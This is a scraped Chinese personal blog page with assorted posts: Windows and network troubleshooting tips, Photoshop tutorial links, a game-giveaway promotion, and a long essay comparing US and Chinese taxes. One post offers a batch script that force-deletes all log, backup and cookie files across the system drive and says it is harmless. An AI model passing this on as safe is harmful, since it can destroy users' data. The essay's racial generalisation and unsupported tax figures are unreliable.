做自己所做，爱自己所爱！
自我介绍
hi! 大家好! 我是liuyepiaoyang12 , o(∩_∩)o...哈哈 ！欢迎光临我的51博客!如果你想认识我，可以给我留言。 我关注的朋友 个人形象
柳叶飘扬
安徽，阜阳 问问
我参与的问题 状态
积分:8589分
魅力指数:100点
人气指数:372点
留言评论:24条 相册 我的更新
我的日记
2009-08-01 09:45
亲爱的朋友们：
注意啦，我有好消息宣布：免费领取
个智慧苹果机会来啦！
今天我在
上发现了一个超级好玩的事情：《梦幻西游》“玩一下，赚一夏”活动！
这个活动可不得了啊，礼物那叫个琳琅满目、品种繁多！我也去凑了下热闹，很容易就注册了《梦幻西游》账号，一进游戏，就有好多老玩家来带我玩，一会就升到了
级；除了领到
币和智慧苹果，朋友还送了我好多超可爱的神兽，听说集齐
大神兽，还能抽
、笔记本电脑大奖呢！
这、这也太轻松了点吧！当时我就想啊，这那是寻宝啊，简直就是抢宝嘛！不过想想也正常，谁叫我人品好呢，好事自然也会送上门啦！哈哈！
什么？你们也想要智慧苹果？还想要
币？还想要
和笔记本电脑大奖？嘿嘿，就不告诉你，偏不告诉你！好啦，逗逗你而已；谁叫我人这么善良，又这么无私呢，我就告诉你们吧：
点这里：
2009-08-01 09:45
参与问问
2008-01-05 20:35
我的日记
2007-09-14 10:59
一、让系统盘更清净(可以在一定程序上保证你的电脑运行速度)
1、进入：控制面板--系统--高级--环境变量
2、单击用户变量中的TEMP--编辑--将那一长串内容变为D:\TEMP(根据你需要，可改成其它盘，但不是系统所在的就行了)
3、同上，将TMP同样改为D:\TEMP。因为这些东西是让你的系统盘快速膨胀的主要内患，其属性是隐藏的，有些朋友还找不到呢：)
4、在“系统变量”同样将TEMP和TMP改成上面的。
5、右键单击桌面“我的文档”--属性--目标文件夹中设置“目标文件夹位置”，将其改为D:\My Documents或D:\我的文档(喜欢哪个由你了)，然后可选移动。
　 这个很重要，事实上当我们的电脑崩溃后，在系统盘中一般没有什么重要的东西，有用的都在My Do......
2007-09-14 10:59
我的日记
2007-09-07 15:51
一、网络自身问题
您想要连接的目标网站所在的服务器带宽不足或负载过大。处理办法很简单，请换个时间段再上或者换个目标网站。
二、网线问题导致网速变慢
我们知道，双绞线是由四对线按严格的规定紧密地绞和在一起的，用来减少串扰和背景噪音的影响。同时，在T568A标准和T568B标准中仅使用了双绞线的 1、2和3、6四条线，其中，1、2用于发送，3、6用于接收，而且1、2必须来自一个绕对，3、6必须来自一个绕对。只有这样，才能最大限度地避免串扰，保证数据传输。本人在实践中发现不按正确标准（T586A、T586B）制作的网线，存在很大的隐患。表现为：一种情况是刚开始使用时网速就很慢；另一种情况则是开始网速正常，但过了一段时间后，网速变慢。后一种情况在台式电脑上表现非常明显，但用笔记本电脑检查时网速却表现为正常。对于这一问题本人经多年实践发现，因不按正确标准制作的网线引起的网速变慢还同时与网卡的质量有关。一般台式计算机的网卡的性能不如笔记本电脑的，因此，在用交换法排除故障时，使用笔记本电脑检测网速正常并不能排除网线不按标准制作这一问题的存在。我们现在要求一律按T586A、T586B标准来压制网线，在检测故障时不能一律用笔记本电脑来代替台式电脑。
三、网络中存在回路导致网速变慢
当网络涉及的节点数不是很多、结构不是很复杂时，这种现象一般很少发生。但在一些比较复杂的网络中，经常有多余的备用线路，如无意间连上时会构成回路。比如网线从网络中心接到计算机一室，再从计算机一室接到计算机二室。同时从网络中心又有一条备用线路直接连到计算机二室，若这几条线同时接通，则构成回路，数据包会不断发送和校验数据，从而影响整体网速。这种情况查找比较困难。为避免这种情况发生，要求我们在铺设网线时一定养成良好的习惯：网线打上明显的标签，有备用线路的地方要做好记载。当怀疑有此类故障发生时，一般采用分区分段逐步排除的方法。
四、网络设备硬件故障引起的广播风暴而导致网速变慢
作为发现未知设备的主要手段，广播在网络中起着非常重要的作用。然而，随着网络中计算机数量的增多，广播包的数量会急剧增加。当广播包的数量达到30%时，网络的传输效率将会明显下降。当网卡或网络设备损坏后，会不停地发送广播包，从而导致广播风暴，使网络通信陷于瘫痪。因此，当网络设备硬件有故障时也会引起网速变慢。当怀疑有此类故障时，首先可采用置换法替换集线器或交换机来排除集线设备故障。如果这些设备没有故障，关掉集线器或交换机的电源后，DOS下用 “Ping”命令对所涉及计算机逐一测试，找到有故障网卡的计算机，更换新的网卡即可恢复网速正常。网卡、集线器以及交换机是最容易出现故障引起网速变慢的设备。
五、网络中某个端口形成了瓶颈导致网速变慢
实际上，路由器广域网端口和局域网端口、交换机端口、集线器端口和服务器网卡等都可能成为网络瓶颈。当网速变慢时，我们可在网络使用高峰时段，利用网管软件查看路由器、交换机、服务器端口的数据流量；也可用 Netstat命令统计各个端口的数据流量。据此确认网络数据流通瓶颈的位置，设法增加其带宽。具体方法很多，如更换服务器网卡为100M或1000M、***多个网卡、划分多个VLAN、改变路由器配置来增加带宽等，都可以有效地缓解网络瓶颈，可以最大限度地提高数据传输速度。
六、蠕虫病毒的影响导致网速变慢
通过E-mail散发的蠕虫病毒对网络速度的影响越来越严重，危害性极大。这种病毒导致被感染的用户只要一上网就不停地往外发邮件，病毒选择用户个人电脑中的随机文档附加在用户机子的通讯簿的随机地址上进行邮件发送。成百上千的这种垃圾邮件有的排着队往外发送，有的又成批成批地被退回来堆在服务器上。造成个别骨干互联网出现明显拥塞，网速明显变慢，使局域网近于瘫痪。因此，我们必须及时升级所用杀毒软件；计算机也要及时升级、***系统补丁程序，同时卸载不必要的服务、关闭不必要的端口，以提高系统的安全性和可靠性。
七、防火墙的过多使用
防火墙的过多使用也可导致网速变慢，处理办法不必多说，卸载下不必要的防火墙只保留一个功能强大的足以。
八、系统资源不足
您可能加载了太多的运用程序在后台运行，请合理的加载软件或删除无用的程序及文件，将资源空出，以达到提高网速的目的。
2007-09-07 15:51
我的日记
2007-08-04 09:21
30秒清除你电脑中的垃圾（使你电脑急速如飞）(高手已测）
要轻松流畅上网你是否注意到你的电脑系统磁盘的可用空间正在一天天在减少呢？是不是像老去的猴王一样动作一天比一天迟缓呢？
　没错！在Windows在***和使用过程中都会产生相当多的垃圾文件，包括临时文件（如：*.tmp、*._mp）日志文件（*.log）、临时帮助文件（*.gid）、磁盘检查文件（*.chk）、临时备份文件（如：*.old、*.bak）以及其他临时文件。特别是如果一段时间不清理IE的临时文件夹“Temporary Internet Files”，其中的缓存文件有时会占用上百MB的磁盘空间。这些LJ文件不仅仅浪费了宝贵的磁盘空间，严重时还会使系统运行慢如蜗牛。这点相信你肯定忍受不了吧！所以应及时清理系统的LJ文件的淤塞，保持系统的“苗条”身材，轻松流畅上网！朋友来吧，现在就让我们一起来快速清除系统垃圾吧！！下面是步骤很简单就两步！
　 在电脑屏幕的左下角按“开始→程序→附件→记事本”，把下面的文字复制进去（黑色部分），点“另存为”，路径选“桌面”，保存类型为“所有文件”，文件名为“清除系统LJ.bat”，就完成了。记住后缀名一定要是.bat，ok！你的垃圾清除器就这样制作成功了！
双击它就能很快地清理垃圾文件，大约一分钟不到。
======就是下面的文字(这行不用复制)=============================
@echo off
echo 正在清除系统垃圾文件，请稍等......
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.*
del /f /s /q %userprofile%\Local Settings\Temp\*.*
del /f /s /q %userprofile%\recent\*.*
echo 清除系统LJ完成！
echo. & pause
=====到这里为止(这行不用复制)==============================================
以后只要双击运行该文件，当屏幕提示“清除系统LJ完成！就还你一个“苗条”的系统了！！到时候再看看你的电脑，是不是急速如飞呢？可别忘了回帖喔！
注：LJ就是垃圾的意思！这招比那些所谓的优化大师好用！最重要的是无论在公司默认的系统环境还是在自己家中的电脑都不会破坏系统文件
2007-08-04 09:21
我的日记
2007-08-03 08:42
2007-08-03 08:42
我的日记
2007-08-03 08:39
2007-08-03 08:39
我的日记
2007-08-03 08:37
2007-08-03 08:37
我的日记
2007-07-31 08:25
‖ 入门72种特效法实例教程‖复制到地址栏查看/学习
》》51限制》点2次的话》才有连接》》‖ 入门72特效‖
1. http://www.poptool.net/quickcheck/ / hop001.htm如何制作晕映效果?
2. http://www.poptool.net/quickcheck/ / hop003.htm如何制作牵手字?
3. http://www.poptool.net/quickcheck/ / hop004.htm如何制作阴影字?
4. http://www.poptool.net/quickcheck/ / hop005.htm如何制作剪纸边缘效果?
5. http://www.poptool.net/quickcheck/ / hop006.htm如何制作倒影效果?
6. http://www.poptool.net/quickcheck/ / hop007.htm如何制作艺术像框?
7. http://www.poptool.net/quickcheck/ / hop008.htm如何制作边框字?
8. http://www.poptool.net/quickcheck/ / hop010/ hop010.htm如何制作燃烧字?
9. http://www.poptool.net/quickcheck/ / hop011/ hp011a.htm如何制作透明字?
10.http://www.poptool.net/quickcheck/ / hop02a/ hp002a.htm如何恢复Photoshop的缺省设置?
11.http://www.poptool.net/quickcheck/ / hop02b/ hp002b.htm如何跳转到其他程序?
12.http://www.poptool.net/quickcheck/ / hop012/ hp012a.htm如何制作立方体贴图?
13.http://www.poptool.net/quickcheck/ / hop013/ hp013a.htm如何制作圆锥体
14.http://www.poptool.net/quickcheck/ / hop014/ hp014a.htm如何制作动感效果?
15.http://www.poptool.net/quickcheck/ / hop015/ hop015.htm如何制作渐变效果?
16.http://www.poptool.net/quickcheck/ / hop016/ hop016.htm如何制作雕刻字?
17.http://www.poptool.net/quickcheck/ / hop017/ hp017a.htm如何制作霓虹字?
18.http://www.poptool.net/quickcheck/ / hop018/ hp018a.htm如何制作立体字?
19.http://www.poptool.net/quickcheck/ / hop019/ hp019a.htm如何制作光芒字?
20.http://www.poptool.net/quickcheck/ / hop020/ hp020a.htm如何制作木质相框?
21.http://www.poptool.net/quickcheck/ / hop021/ hp021a.htm如何制作相角效果?
22.http://www.poptool.net/quickcheck/ / hop022/ hop022.htm如何制作透明浮雕字?
23.http://www.poptool.net/quickcheck/ / hop023/ hp023a.htm如何制作四分仪颜色效果?
24.http://www.poptool.net/quickcheck/ / hop024/ hp024a.htm如何制作太阳雨效果?
25.http://www.poptool.net/quickcheck/ / hop025/ hp025a.htm如何制作笔触金属字?
26.http://www.poptool.net/quickcheck/ / hop026/ hp026a.htm如何制作蜥蜴皮效果?
27.http://www.poptool.net/quickcheck/ / hop027/ hp027a.htm如何制作线性渐变效果?　
28.http://www.poptool.net/quickcheck/ / hop028/ hp028a.htm如何制作发光字?　　
29.http://www.poptool.net/quickcheck/ / hop029/ hp029a.htm如何制作分格效果?　
30.http://www.poptool.net/quickcheck/ / hop030/ hp030a.htm如何制作影视剪辑效果?
31.http://www.poptool.net/quickcheck/ / hop031/ hp031a.htm如何制作暴风雪效果?
32.http://www.poptool.net/quickcheck/ / hop032/ hp032.htm如何制作风车字?
33.http://www.poptool.net/quickcheck/ / hop033/ hp033.htm如何制作星空效果?
34.http://www.poptool.net/quickcheck/ / hop034/ hp034.htm如何制作贴图字?
35.http://www.poptool.net/quickcheck/ / hop035/ hp035.htm如何制作铁皮字?
36.http://www.poptool.net/quickcheck/ / hop036/ hp036.htm如何制作渗透字?
37.http://www.poptool.net/quickcheck/ / hop037/ hp037.htm如何制作透视效果?
38.http://www.poptool.net/quickcheck/ / hop038/ hp038.htm如何制作莹光字
39.http://www.poptool.net/quickcheck/ / hop039/ hp039.htm如何制作水中花　　
40.http://www.poptool.net/quickcheck/ / hop040/ hp040.htm如何制作风吹效果
41.http://www.poptool.net/quickcheck/ / hop041/ hp041.htm如何制作邮票？
42.http://www.poptool.net/quickcheck/ / hop042/ hp042.htm如何制作漩涡字？
43.http://www.poptool.net/quickcheck/ / hop043/ hp043.htm如何制作星状放射线效果
44.http://www.poptool.net/quickcheck/ / hop044/ hp044.htm如何制作闪电效果？
45.http://www.poptool.net/quickcheck/ / hop045/ hp045.htm如何制作编织字？
46.http://www.poptool.net/quickcheck/ / hop046/ hp046.htm如何制抽线效果？
47.http://www.poptool.net/quickcheck/ / hop047/ hp047.htm如何制作滴血字？
48.http://www.poptool.net/quickcheck/ / hop048/ hp048.htm如何制作海市蜃楼效果？
49.http://www.poptool.net/quickcheck/ / hop049/ hp049.htm如何制作卷边效果？
50.http://www.poptool.net/quickcheck/ / hop050/ hp050.htm如何制作文字图画？
51.http://www.poptool.net/quickcheck/ / hop051/ hp051.htm如何制作碎片字？
52.http://www.poptool.net/quickcheck/ / hop052/ hp052.htm如何制作撕纸效果？
53.http://www.poptool.net/quickcheck/ / hop053/ hp053.htm如何制作迷彩字？
54.http://www.poptool.net/quickcheck/ / hop054/ hp054.htm如何制作烧纸效果？
55.http://www.poptool.net/quickcheck/ / hop055/ hp055.htm如何制作流星效果？
56.http://www.poptool.net/quickcheck/ / hop056/ hp056.htm如何制作浮雕效果？
57.http://www.poptool.net/quickcheck/ / hop057/ hp057.htm艺术图案
58.http://www.poptool.net/quickcheck/ / hop058/ hp058.htm凸起的长圆按钮（按钮一）
59.http://www.poptool.net/quickcheck/ / hop059/ hp059.htm方形按钮（按钮二）　　
60.http://www.poptool.net/quickcheck/ / hop060/ hp060.htm橡胶按钮（按钮三）　
61.http://www.poptool.net/quickcheck/ / hop061/ hp061.htm立体按钮四 　
62.http://www.poptool.net/quickcheck/ / hop062/ hp062.htm百叶窗效果
63.http://www.poptool.net/quickcheck/ / hop063/ hp063.htm换脸技术 　　
64. Photoshop导航器和动作的技巧http://www.poptool.net/quickcheck/ /qita/qita1.htm
65. Photoshop复制的技巧http://www.poptool.net/quickcheck/ /qita/qita2.htm
66.Photoshop界面技巧 http://www.poptool.net/quickcheck/ /qita/qita3.htm
67.Photoshop工具技巧 http://www.poptool.net/quickcheck/ /qita/qita4.htm
68. Photoshop复制的技巧http://www.poptool.net/quickcheck/ /qita/qita5.htm
69. Photoshop选择技巧http://www.poptool.net/quickcheck/ /qita/qita6.htm
70.Photoshop使用层的技巧 http://www.poptool.net/quickcheck/ /qita/qita7.htm
71. Photoshop辅助线和标尺的技巧http://www.poptool.net/quickcheck/ /qita/qita8.htm
72. Photoshop热键一览表http://www.poptool.net/quickcheck/ /qita/qita9.htm
2007-07-31 08:25
我的日记
2007-07-06 08:59
2007-07-06 08:59
我的日记
2007-07-02 08:57
我知道没办法忘记你
但我每天都会送你祝福
也给自己一个微笑
不让自己情绪化
与其那样
不如把它化为一种动力
多为自己铺些平坦大道
比较实际些
爱不等于占有 爱他就给他自由
2007-07-02 08:57
条) 留言
您还没有登录，请登录后发表留言、评论！
用户名/彩虹号：
　　　　 密码：
隐身登录 2007-12-05 09:07 踩你来拉 2007-11-21 22:24 踩！
我再踩！
我用力踩！
我很用力踩！
我非常用力踩！
我用尽全力去踩！
就算鞋子烂也要踩！
就算腾讯倒闭也要踩！
就算天塌下来我都要踩！
要是天真塌下来了继续踩！
要是地面凹了我不管继续踩！
要是踩到我脚骨折我也继续踩！
要是别人见了骂我傻我还是要踩！
要是***敢过来阻止我就更加要踩！
要是你看我不爽我没办法还要继续踩！
要是你觉得敢兴趣你也可以过来一起踩！
踩到地下水喷发造成洪灾损失惨重我也踩！
踩到益阳地震山崩地裂地下水泛滥我还要踩！
踩到火山喷发太平洋海啸我还要继续往死里踩！
踩到阎罗王说我制造噪音我刁根烟看看他继续踩！
踩到日天昏地暗惊天地泣鬼神我不管我还要继续踩！
踩到刚刚重建好的伊拉克房屋又倒塌了我不管还要踩！
踩到日本岛所有导弹由于震波影响而突然自爆我还要踩！ 2007-11-17 18:19 红你很喜欢啊 2007-11-17 20:06回复
什么意思? 2007-11-17 18:19 hong nixihuan ma 2007-10-31 11:18 漂亮 2007-10-31 22:01回复
谁?你吗? 2007-11-01 21:38回复
你啊 Copyright 2005-2011 51.com
您还没有登录，请登录后发表留言、评论！
用户名/彩虹号：
　　　　 密码：
隐身登录
喜欢这套模板吗？点下方按钮拥有它~2006-08-24 09:12
(分类:
一、市长与平民没什么两样　　记得2000年在OSU，布什和戈尔都去OSU演讲争取选票。我当时开车从住处去学校，在快到学校的趴车场的时候，有俩个***提示我停下车。我停下观望，只见四辆黑色轿车开了过去，随后俩个***开摩托走了。一会经过学校礼堂，才知道布什同志在里面演讲，刚看见的四辆黑色轿车就停在外面。当时我就想这种不扰民的举动在中国肯定是做不到，一般就要几条街戒严了。　　2001年圣诞节张惠妹到硅谷开演唱会，我当然不错过跑去观看.演出还请了SANJOSE (硅谷的英文城市名)市市长，演出快结束时，张惠妹请市长上台，台上还有很多观众，市长很自然的就和观众一起跟随张惠妹的歌声又唱又跳。那首歌结束，市长站在观众的队伍里，不声不响的和观众一起排队走下台。　　当时我又想，这要在中国，市长不在台上被介绍恭维一番，事后不再讲几句，然后由众人掌声和目光送下光荣走下台，那会出大事的。比如市长大发雷霆，某些人受处分…… 　二、美国的餐馆没有雅座　　有一次和俩个中国朋友去吃饭，其中是一个北大的学生，说话风趣反应敏捷，我非常喜欢听他说话，他总是能把很单调的事情说的风趣异常。那次也不例外，他笑着问我：“你发现了没有？美国的餐馆里没有雅座。”我点头表示同意，他继续说：“要是在美国某个餐馆还弄个雅座，老板碰见有钱的喊声：楼上请！那肯定挣几辈子的钱都不够打官司的。”顾客来了，指着雅座说：我要坐那个位置！要是不交钱不让座，那肯定上法院了，老板得按歧视罪处理，那什么精神损失费乱七八糟一加起来，没法计算了。　　美国上学要实习平权法，那就是按照种族比例招收学生。比如黑人学生，他们一般学习都不好，但大学招生的时候，一定要根据平权法招生一定比例的黑人学生，不能因为黑人成绩比别的种族差，大学校圆里就没有黑人学生了。
　　三、普通百姓都有社会保障　　前阵子看雅科夫写的一篇关于医疗制度的文章，我当时看完了吓了一跳，心里也着实难过。这市场化不叫市场化，叫做乱七八糟自由化。在再发达的国家，也不是绝对市场化的，比如在美国医疗教育很多方面其实都不市场化。医疗实行保险制度，一般由自己所在的公司买全家的医疗保险，就比如我先生的公司就买我们俩个的医疗保险，如果有孩子，孩子的也公司买。家庭年收入在3万美金以下，国家就会相应的医疗保险政策，当然还是有买不起很好的医疗保险的。我认识一个70多岁的老太太，动了个大手术花了80多万美金的手术费，是中国过去看孩子等绿卡的中国公民，送进医院没钱也没医疗保险。医院确定了，还是动了手术，根据老太太的收入，每个月付80多美金偿还，其实到死我估计也还不了一万块钱。　　记得以前中国的工人买房子是所在单位负责，现在买房子开始市场化了，前俩天看了一篇文章，说中国加大步伐的房地产改革如果不放慢脚步会出问题。其实居民买房子也不应该完全市场化，美国政府其实分担居民买房子，比如一个朋友买了一个54万的HOUSE，30年还清，每个月付2700$，但政府每个月退税大概500$，其实这是政府负担的一部分费用。　　还有教育，我是96年上的大学，那年中国高校开始自费制度，我当时学费好象是一学期2400元，其实对于很多家庭这是很大一笔支出。但美国的教育制度不是完全市场化的，如果你有钱可以上私立学校，家庭很一般的上公立学校。今年我填报税单的时候发现，在加洲，如果你是加洲居民(在加洲交税一年便是加洲居民)，那么你自己或你的配偶孩子如果念本科，头俩年的学费可以退92%，后俩年是70%多。研究生也退，我算加洲居民，一门一千多美金的课退了好象300多。如果这样还嫌贵可以上社区学院，每个学分十几块钱，到大三或大四再转到洲立大学，所有学分全转过去。 四、中国有“平权教育”吗？　　还有很多问题，比如基础建设等等。那天和过时聊天，说起来不知道中国政府把钱花在哪块了，哪一块都乱七八糟的。可美国是实实在在感觉取之于民用之于民，总统洲长什么选举，他们要自己去筹钱，国家不会来出钱的。美国还要耗费在全世界东打打西打打的军事费用，还要给自己心爱的小破国的费用等等，但其实很多方面比社会主义国家还要公有制，欧洲那就更不用说了，福利局都快成为发展的累赘了。但中国政府的钱却不知道实际花到哪儿去了，就见一座座大楼高上去，贫富悬殊越来越大，社会问题越来越多越来越严重。
　　五、中美市长央视比富，美市长自愧不如　　看了中央电视台最近一期“让世界了解中国”的节目，其中主要出场人员为中美两位市长，中国是威海的崔市长，美国是来得蒙得的艾文市长，主题围绕中美两位市长通过电视相互对话，交谈各自城市的建设和发展而展开，目的是让世人了解中国，让中国人了解世界。　　前半段节目无大问题，后半段节目中暴露出几个问题，令人深感惊愕和感叹。主要问题出在中美两位市长互相邀请对方访问自己城市的环节上。双方经几次互相邀请，在美国艾文市长表现出了“吝啬”之后，中国崔市长表现出了“慷慨”。一个“慷慨”，一个 “吝啬”，显现出中美两国官员的“真情”。令吉安深感惊愕和感叹的问题，就出在这 “慷慨”和“吝啬”之绝然不同之上。　　先讲明“慷慨”与“吝啬”的内容。美国艾文市长在高兴地接受了中国崔市长的邀请之后，“吝啬”地表示她没有访华的费用，并解释她虽然身为一市之长，但她的办公费用来自于市民的纳税钱，每一笔开支必须要对她的市民负责，访华的费用将是一笔额外开支，不在她的办公费用之列，故，她需先向有关企业募捐，获得企业的赞助之后，才能安排访华的行程，云云，十分自然、恳切。　　中国崔市长在高兴地接受了美国艾文市长的访美邀请之后，没有表示任何对旅行费用的顾虑。相反，在听到上述艾文市长“吝啬”的言词之后，立刻“慷慨”地表示他将支付艾文市长访华的一切费用，在节目主持人的“辅助”之下，还一一列明包括来回机票、住宿、吃喝等全部费用，另外，还主动表示要向艾文市长赠送衣服礼品，云云，也是十分自然、恳切。中国崔市长的“慷慨”，令“吝啬”的美国艾文市长眉笑眼开，表示当晚就要打包上路。看到这里，大家应该明白人们的惊愕和感叹从何而来。
　　六、威海市长在慷谁之慨？　　还是要解释解释这惊愕的原因。先比较两城市，美国艾文市长所在的来得蒙得市，是世界最富有的微软公司总部、任天堂公司在美总部，等大公司所在地，税收财源不可谓不厚，艾文市长为访华向任何一家公司募捐有关经费，是不难获得足够的赞助的。而威海是一个从四个小村庄发展起来不久的小城市，其经济实力与来得蒙得市的相比，差距显而易见，比较结果，来得蒙得市比较富，威海市比较穷。再比较两市长，以中美两个市长的个人收入相比，相信艾文市长的肯定要比崔市长的高，比较结果，艾文市长比较富，崔市长比较穷。可是，为什么美国富市的富市长如此“吝啬”，而中国穷市的穷市长却如此“慷慨”？这，能不让人们深感惊愕吗？！　　就艾文市长单人访华费用作一估算，来回机票，吃住等全部费用如果按一周时间计算，应该在五千美元左右，约折合人民币四万元，崔市长的访美费用应该与此相当，崔市长为了了解艾文市长，并且为了要让艾文市长了解崔市长，近期的费用的预算就是八万元人民币。就本人了解，国家主席一年的工资多不过八万元咧。小小一个威海市长的工资能有多少？崔市长若是慷慨地自掏腰包赴美，并慷慨地自掏腰包支付艾文市长访华的费用，人们则当哑口无言，不过，却又实在替崔市担心，互访过后，崔市长一家如何过年呢？想必崔市长是慷其所在威海市之财政慨了，其慷慨想必早已胸有成竹，且习以为常了。这，便是“慷慨”“吝啬”的对比。
　　七、中国的市长何时能象美国市长那样“吝啬” 　　令人惊愕之余又生出的感叹是，在中美两地一女一男的中国节目主持人竟带头为崔市长这种自杀式的“慷慨”鼓掌，全场观众也都为之喝彩，无一人就此发问。真可谓有什么样的观众就有什么样的市长！中国比美国差的何止是市长，至少还包括这十几亿浑浑噩噩的国民。一个威海市市长如此“慷慨”八万元，全国多少个市长也都如此慷慨八万元，中国亿万纳税人的血汗，就会在“让中国了解世界，让世界了解中国”的过程中，源源不断地让中国市长们“慷慨”出手，美国市长们“吝啬”笑纳了去。这种“慷慨”，是对，是错，中国的纳税人不该三思吗？中国的官员们何时能象美国艾文市长那样“吝啬”？ 八、中美税率比较　　在美国加州，好像是年收入28000美元以上的才需要缴税。中国的个人所得税率为：中国的每月3500元人民币的税率相当于在美国5万美元年薪 (单身)的税率！美国的个人所得税可以扣除很多东西，年底有一次总的算法，如果你多交的会退回给你，有很多的利益，老来退休的时候国家每个月会给你很多钱养老，这钱可能比你交的税要多很多。在中国，如果你在这个月有收入，就缴税，下个月没有收入了，也不会退税，年底没有，退休也没有，永远都没有退税! 　　美国的税率是按照家庭来算税的，如果你的收入要养老婆，就按照两个人来算，还有孩子就按几个依赖你的人来算税。这时候，你的税率是非常之低，低至没有的地步！甚至孩子多了的时候国家还补贴钱给你。如果你的老婆有收入，家庭的收入加起来一起算税比分开算税的税率要低一些。中国的税从来都不考虑你的明天和你的小孩，决不考虑家庭因素。中国没有养老，年轻人可能要养活四个老人和一个孩子。中国把养老这个问题丢给了社会和个人，国家和政府卸掉了全部责任。要求单位负责为个人交养老保险。现在我个人每个月交400多，单位帮我交800多元。你看他们多会卸责任啊？！你交的税没有给你带来任何养老和任何好处。给社会上的企业和单位带来负担。美国交了税后，享受到了该享受的所有好处，上高速公路免费，汽车年费为不到几十美元，考驾驶执照12美元。没有养路费的说法。子女上大学之前免费。美国如果失业，可以拿到每个月大约1000多美元的失业金，这钱足够租房和吃饭费用。在中国现在我个人和单位每个月交了300多元失业保险，如果失业，每个月如果跑断腿，找各种部门和机关，可能可以拿到400元人I民币每月。这钱在中国城市里是不够租房和吃饭的。你会发现这个失业保险是非常搞笑的。
　　买房：中国买房交契税，0.75到2，美国买房退税。　
　　买车：中国缴税，美国退税。
　　子女上幼儿园：国内大城市大多一万到两万一年，也有便宜的。
　　子女上初中，高中：国内大城市大多一万到两万一年，也有便宜的。　
　　子女上大学：中国的学费已经可以和英国相提并论了。
　　炒股票投资失败：中国没有人管，你去跳楼还要抓你去坐牢，美国退税。
　　缴税记录：美国有，中国收了税也不给你收据，和你的福利不对应。
　　我们看一下一个私人企业和老板要交多少税：33的企业税，17的***，45的个人所得税! 那他一年的总收入是多少？他一年总收入能否养活他自己？　　中国有些人太荒唐了，大学生勤工捡学也要缴税！
　　九、中美生活质量大对比　　上海，北京等中国的大城市的房子已经是80万到100万的价格了，够工作的人奋斗一辈子，子女的学费，养老，失业等一大堆问题。国家政府和制定政策的人有稳定的收入，从来不知道老百姓的苦楚和生活质量在稳步下降。　　我们来算一下一个月收入19000的人的生活质量：他要交养老金和住房金2500元，要交个人所得税3000元，最后到手的是14000元左右。他要连续这样工作七年才能买一个房子。他的这种收入在国内号称是高收入，可不稳定。大城市一个小孩的花费每月要2000多元还不包括读书费用。　　老百姓生活质量稳步下降!不堪压力重负！　　美国人买的房子都是别墅，中国买别墅的房子一点都不比加州便宜，中国的别墅一个月什么管理费都要一万多呢，而美国呢？
十、生活成本太高就意味着极度的腐败和贪污　　美国等国家已经多次减少税收，我们把税收的增加当作政绩来谈。悲哀啊，不考虑民生！中国的每月3500元人民币的税率相当于在美国5万美元年薪的税率，可生活质量差别之巨大！美国5万美元一年已经可以养家了，中国大城市里，3500元/月永远都买不起房子，税一扣，每月交通和房租一交，给父母300，吃饭500，连自己都养不活。　　政府又在谈要调整税率，他们可能会对低收入稍微调低，但是他们不会减少总的税率和税收收入! 　　为老百姓好的东西永远都学不来，为自己好的东西一夜就学来了，还大声高叫:中国所得税比较低的，西方国家的个人所得税才高呢! 　　我想大声疾呼，请凭事实说话?我是从美国回来的人，我是凭事实在这里说话。另外请到互联网查美国的税率。中国任何调整税率都意味着增加增收税！任何国家，老百姓的生活成本太高就意味着腐败和极度贪污！大多数的人到这时候都会骂我一句：有本事你去美国或者移民美国,那么我要反问一句：“为什么非要去美国？我们中国人不会向人家学学吗？” 　　我不知道为何在中国那么多归国人员，不写这篇文章。为了大家，为了老百姓，我早就想写这篇文章。但是我的时间实在有限，同时我也不是税务专家。写的不够详细和深入。希望爱猫扑.爱生活。　　
　　我始终觉得中美之间的经济差距不可怕，真正可怕的是教育上的。这种平权的教育，社会只有分工，没有高低贵*。每一个人自食其力，受到尊重，就算你贵为总统，你也没有高贵到哪儿去，你只不过职业是总统，享受你职业上的待遇，但还是一个普通的公民。
2006-08-23 09:14
(分类:
网吧网络刻盘 GHOST V7.5企业版以上版本
一、将一台客户机装好系统及所有应用程序及游戏后，用GHOST.EXE制作一个全盘影像，例：win98.gho
二、制作全盘影像时要注意2点：
1、因制作全盘影像时，不能将影像文件保存在本盘上，所以要记得挂多一个硬盘用来存放影像文件；
2、因一般40G的硬盘，在装了系统及游戏后，大都已使用30多G的空间，制作出来的全盘影像会达14-17G左右，并在制作过程中，影像文件达到2-4G时（时间太紧，没研究为什么会有时2G有时4G）会弹出一个提示窗，并有OK、取消、文件名三个按钮，选OK的话，GHOST自动生成一下个后继文件，文件名后缀好象是gho；选“文件名”的话，GHOST会让你自己输入后继文件名及存放位置.
三、以我用40G硬盘36G数据制作全盘影像为例，生成了四个4G左右的影像文件，文件名是：win98.gho、win98.gls、win982.gls、win983.gls（注：那天做盘时太忙，只记得后缀文件好象是gls这个后缀名，又好象是gsl，反正大家制作时以眼见为实吧。呵，不然我就误人子弟了。）
四、运行GhostCast网络克隆服务端文件GhostSrv.exe，
注：1、“影像文件”处只要选中后缀为gho的文件就行了，后继文件不用管。
2、要进行全盘网络克隆时选中“硬盘”，要进行分区网络克隆时（如：只是网络克隆C盘）选中“分区”，再点右边的下拉菜单，并选中要网络克隆的分区就行了。
3、如果在自动开始模式里输入了条件，点击了“接受客户端连接”按钮后，实际上不能达到条件时（如：客户端数量处输了60，但实际上只有55台机接入），可以点击“发送”按钮开始网络克隆。
4、如果未在自动开始模式里输入条件，点击“接受客户端连接”按钮后，确认所有客户端连接成功后，点击“发送”按钮开始网络克隆。
五、服务器端点击“接受客户端连接”按钮后，就可以到客户机上运行客户端了。
六、客户端上的准备工作：
GhostCast网络克隆客户端设置（以原客户机已装系统，8139网卡，无软驱为例）：
1、先COPY GhostCast网络克隆客户端文件：
netghost.bat //加载网卡驱动及运行GHOST.exe的批处理
8139.com //8139网卡驱动 FOR DOS
Wattcp.cfg //GhostCast网络克隆客户端配置文件
ghost.exe //不用说明了吧
到客户机上，并用记事本或DOS下的edit修改wattcp.cfg，内容如下：
